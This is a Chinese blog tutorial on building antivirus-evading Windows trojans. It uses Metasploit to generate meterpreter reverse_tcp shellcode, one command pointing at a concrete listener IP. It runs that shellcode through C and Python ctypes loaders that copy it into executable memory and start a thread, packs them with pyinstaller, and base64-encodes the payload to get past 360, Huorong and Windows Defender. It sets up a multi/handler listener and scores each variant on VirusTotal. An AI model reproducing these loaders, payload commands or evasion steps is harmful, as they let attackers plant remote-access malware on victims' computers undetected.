注:以下实验截图均为本人发稿时重新测试所截
ctypes是Python的外部函数库。它提供了与C兼容的数据类型,并允许调用DLL或共享库中的函数。具体可参考文末的官方文档
动态链接库是微软公司在微软Windows操作系统中,实现共享函数库概念的一种方式。其后缀名多为.dll,dll文件中包含一个或多个已被编译、链接并与使用它们的进程分开存储的函数。我们经常在程序安装目录下看到它们。
可直接将python语言编写的py程序打包为exe可执行文件,而不需要安装python环境即可直接运行。使用pip安装即可
打包常用命令:
pyinstaller-F-wx.py4.shellcodeshellcode是一段用于利用软件漏洞而执行的代码,格式为16进制的机器码。因为经常让攻击者获得shell而得名。shellcode常常使用底层语言编写,如c/c++,汇编。
注意:shellcode是16进制格式的,字节流的数据,很底层。所以我们需要了解下它的执行过程,分为四步:(1)申请一片内存;(2)将shellcode放到申请的内存当中;(3)创建线程;(4)执行。了解了这个过程,就好理解后面的代码了
Win10系统中自带的防护软件,默认开启,当用户安装了别的防病毒软件时,会自己关闭,需要用户自己手动开启。
本机win10x64位安装了火绒安全软件,visualstudio2019,pycharm,python3.9.5x64位
腾讯云服务器:debian10,添加了kali源,安装了msf
测试机器1:虚拟机win10x64位,不安装任何杀毒软件,使用自带的windowsdefender
测试机器2:虚拟机win10x64位,安装了电脑管家,360安全卫士,360杀毒
测试机器3:虚拟机win7x64位,不能执行win10下用pyinstaller打包的成的exe文件,安装了电脑管家,360安全卫士,360杀毒,测试杀软的静态查杀能力
注:本文中所有杀软均为默认设置,且病毒库升级到最新
首先我们来生成一个简单的dll文件,打开visualstudio2019创建一个动态链接库(dll)项目,可以看到预写入一些代码,我们不用管它,直接加入以下代码:
extern“C”:这里由于文件后缀为.cpp,即c++文件,而ctypes只能调用C函数,c和c++编译方式又不太一样,如果在编译时把c的代码用c++方式编译,会产生错误。故在c++引入c的库时要加extern“C”
voidTestCtypes():定义一个返回为空,名为TestCtypes的函数,该函数是打印helloworld!
接下来,点击生成→生成解决方案即可生成一个.dll文件
那么如何使用python加载dll,并调用里面的函数呢?
很简单,几行代码搞定:
最后将刚才生成的DLL文件放到py文件同目录下,运行py文件:
注意这里有坑,如果你的python是64位的,生成dll文件时debug一定要选x64,不然运行py文件调用dll时会报错,32位python就是默认的x86
我们先用msf生成一段C的shellcode
msfvenom-pwindows/meterpreter/reverse_tcplhost=x.x.x.xlport=8080-fc打开visualstudio创建一个空项目Project1,在源文件中新建一个shell.c文件
下面的代码是网上公开的最简单的一段执行shellcode的代码
#include
VirtualAlloc()函数的作用是申请一块内存空间
参数:
LPVOIDVirtualAlloc{
LPVOIDlpAddress,//要分配的内存区域的起始地址
DWORDdwSize,//分配的大小
DWORDflAllocationType,//分配的类型
DWORDflProtect//该内存的初始保护属性
};
MEM_COMMIT|MEM_RESERVE表示为指定地址空间提交物理内存或保留指定地址空间,不分配物理内存
PAGE_EXECUTE_READWRITE表示可读写可执行
Memcpy()内存拷贝函数,函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中
语法参数:
void*memcpy(void*destin,void*source,unsignedn);
destin--指向用于存储复制内容的目标数组,类型强制转换为void*指针。
source--指向要复制的数据源,类型强制转换为void*指针。
n--要被复制的字节数。
在刚开始学习的时候一定要注意理解网上已有的公开代码,这样后面会越学越轻松的,另外就算我们对某种语言不了解,看函数名也能大致知道函数的作用了,这就是学习方法。
将代码编写好,最后点击生成→生成解决方案,将其编译为exe文件
注意此处有坑,生成解决方案时请在工具栏中选择releasex86,不然会报如下错,win7,win10都一样
看下免杀效果:火绒,360,defender直接查杀
电脑管家没报毒(轻松绕过,后面可以直接关闭,无视它了)
msf开启监听:
useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost0.0.0.0setlport8080执行exe,测试机器2成功上线,并能执行命令:
将生成的exe文件上传到Virustotal.com看下查杀率:30/67
在网上公开的代码中,主要有两种写法
简单点的:
#调用kernel32.dll动态链接库中的VirtualAlloc函数申请内存rwxpage=ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x3000,0x40)#调用kernel32.dll动态链接库中的RtlMoveMemory函数将shellcode移动到申请的内存中ctypes.windll.kernel32.RtlMoveMemory(rwxpage,ctypes.create_string_buffer(shellcode),len(shellcode))#创建线程并执行shellcodehandle=ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)ctypes.windll.kernel32.WaitForSingleObject(handle,-1)复杂点的:
#调用kernel32.dll动态链接库中的VirtualAlloc函数申请内存ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)#调用kernel32.dll动态链接库中的RtlMoveMemory函数将shellcode移动到申请的内存中ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))#创建线程并执行shellcodeht=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))本人在实验过程中第二种写法没运行成功过,故本文的实验都是在第一种写法的代码上进行的,来大致解释下各个函数的意义:
windll是载入动态库的方法,kernel32是win32系统的动态库,由此可以知道ctypes对win32的系统和程序会有较好的支持,对于64位的程序可能并不那么友好(手动捂脸)
VirtualAlloc这个与C中的具有一样的功能,参数也是一样,0x3000就是表示MEM_COMMIT|MEM_RESERVE,0x40就是PAGE_EXECUTE_READWRITE,可读写可执行,这个百度一下C语言的VirtualAlloc函数就知道了
RtlMoveMemory与2中的memcpy函数一样,这里就不过多解释,想深入了解的可以搜下
create_string_buffer()将shellcode写入内存中,python的byte对象是不可以修改的.如果需要可改变的内存块,需要create_string_buffer()函数
CreateThread()和WaitForSingleObject()
请参考:
本文只讨论使用python-ctypes模块加载shellcode的免杀思路和效果
在进行免杀对抗前,先来了解下杀软的查杀原理:
一般是匹配特征码,行为监测,虚拟机(沙箱),内存查杀等。360和火绒主要使用特征码检测查杀病毒(云查杀也是特征码检测)。
Msf中生成payload:
msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=x.x.x.xlport=8080-fc注意:我的python是64位的,在我的环境中如果采用windows/meterpreter/reverse_tcp这个payload,最后实验会失败;但在一些x64的python中又是可以的,这里大家多尝试
上代码:
importctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"shellcode+=b"\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48".....................shellcode+=b"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64rwxpage=ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x3000,0x40)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage),ctypes.create_string_buffer(shellcode),len(shellcode))handle=ctypes.windll.kernel32.CreateThread(0,0,ctypes.c_uint64(rwxpage),0,0,0)ctypes.windll.kernel32.WaitForSingleObject(handle,-1)可以看到这里加载执行shellcode的代码和上面是不太一样的,这是我环境的特殊性(再次捂脸),但在一些x64位的环境中又是没问题的,造成这样的原因是x86和x64的兼容性问题。具体的原因分析请参考文末的参考链接
经过测试,这里将c_uint64改为c_int64,c_void_p都能成功,
运行ms1.py,能成功上线并执行命令
打包:
pyinstaller-F-wms1.py注意:由于我是在windows10上打包的,所以打包后的exe只能在win10上运行,win7运行不了,且在打包过程中有这样的信息:
看下免杀效果:
360安全卫士,360杀毒居然没报!惊呆了
点击执行,测试机器2成功上线并能执行命令
本机火绒没杀,扫描时报毒,扫描界面开启时,点击程序并不能执行,但将扫描界面关闭,再点能成功上线并执行命令。
这教育我们别自己作,如果下载的破解版软件用杀软扫描报毒,别再运行了,除非你想当肉鸡(狗头)
windowsdefender没查杀,运行后上线,但随后连接被断开,且defender自动将程序杀掉,强,动态查杀
将ms1.exe文件上传到Virustotal.com看下查杀率:11/67
Msf生成shellcode:
msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=1.14.97.186lport=8080--encryptbase64-fc上代码:
运行py成功并上线
pyinstaller打包,看下免杀效果:
测试机器3上扫描没报毒,拖到测试机器2上提示这个,点击允许,360扫描ms2.exe没报毒
有点奇怪,之前实验时没报这个。这里反复试验了几次,给文件改名也会弹出这个,点击允许,再用360扫描没报毒,ms2.exe直接不能拖进去
执行程序又能成功上线,很迷,我只能理解为360杀毒是不是不稳定,请大佬赐教。
windowsdefender没查杀,运行后上线,但随后连接被断开,且defender自动将程序杀掉,又是动态查杀,强!
火绒和第一回合结果一样
将ms2.exe文件上传到Virustotal.com看下查杀率:10/67
1.写个python脚本将生成的经过编码的shellcode进行去空和去掉换行后,上传到服务器
代码:
360扫描没报毒,执行后能够成功上线并执行命令
火绒和前两个回合一样
Defender动态查杀
Virustotal查杀率:9/66
免杀效果:完美干掉360和火绒(注:这里执行代码不用全部编码也能过火绒,具体参考文末链接)
注:在本人前面的实验中,前三个回合火绒都是瞬间查杀的
Virustotal查杀率:9/65
Virustotal查杀率:10/66
微步云沙箱:3/25
前面说过虽然所有杀软病毒库为最新,但都是默认设置,后面检查了发现360杀毒和火绒都没啥,主要是360安全卫士,默认是这样的
后面两个需要自己点击去下载,人工智能引擎倒没啥,主要是鲲鹏引擎很强大,加了鲲鹏后,全部报毒
但如果用户下载的是破解软件,报毒也要安装的话,也会成功上线,如果不执行添加用户这样的敏感操作的话,360也不会提示,在这点上倒是win10自带的defender更强大。
综合本文记录的实验结果和自己前面几次实验来看,我有如下结论:
1.默认设置下,杀毒能力火绒>360安全卫士=360杀毒>腾讯电脑管家,当360安全卫士添加了鲲鹏引擎后,杀毒能力比其他的都强
2.几款主流杀软都有一个痛点,如果当前网络状态不好,势必会对查杀效果有影响;另外如果用户错误点击了带有免杀的木马,并不会有主动断开连接的操作
3.win10普通用户,如果不是特别需要用到几款主流杀软的一些功能,如:360的软件管家、火绒的火绒剑,用自带的defender足够了
这里先讲几个概念:生成器,加载器,打包器,加密器,执行器
本文中我们是用msf生成的C的shellcode,msf就叫生成器
使用python的ctypes模块加载shellcode,ctypes就叫做加载器
用pyingstaller将代码打包成exe,pyinstaller就叫打包器
选用base64编码对代码进行混淆,base64这就加密/编码器
我们是通过ctypes调用并执行C的函数,这就是执行器,网上也有很多shellcode生成器,有其特殊的机制去将代码执行或生成exe
对于生成器的选择,可以有msf,CobaltStrike(CS)等
加载器的选择,可以有ctypes,c/c++,ruby,c#,go语言等
打包器的选择python中就有pyinstaller,py2exe,编译方式不一样,免杀效果也不一样
加密器的选择有base64,hex,异或,AES,RSA
把这些选择排列组合一下是不是就会有很多方式了?
我们还可以将执行shellcode的函数写到dll文件中,然后通过exe去调用
免杀的技术方法还有dll替换,资源文件修改,签名,特征码定位,加壳,改变生成shellcode时的参数,套娃(如:编码之后加密再加密)等等
思路是不是一下就开阔了起来。学免杀一定要学原理,只是把网上的一些免杀代码进行编译,或是利用工具生成,这些都没啥用,工具特征码迟早会被检测到,如果工具没更新了,自己是不是就没办法了(迪总语录)。而且别人写的这种工具会不会留有后门。所以还是自己动手,丰衣足食。
本文所讲述的免杀方法很初级,但这些方法,目前绕过国内默认配置的主流杀软是没问题的,就算以后被检测出来了,我们需要做的就是改变下思路,会编写点代码就行了,免杀是如此丰富多彩。
小迪师傅ctypes免杀原文
python-ctypes官方文档
python使用ctypes库调用DLL动态链接库
Pythonx64下ctypes动态链接库出现accessviolation的原因分析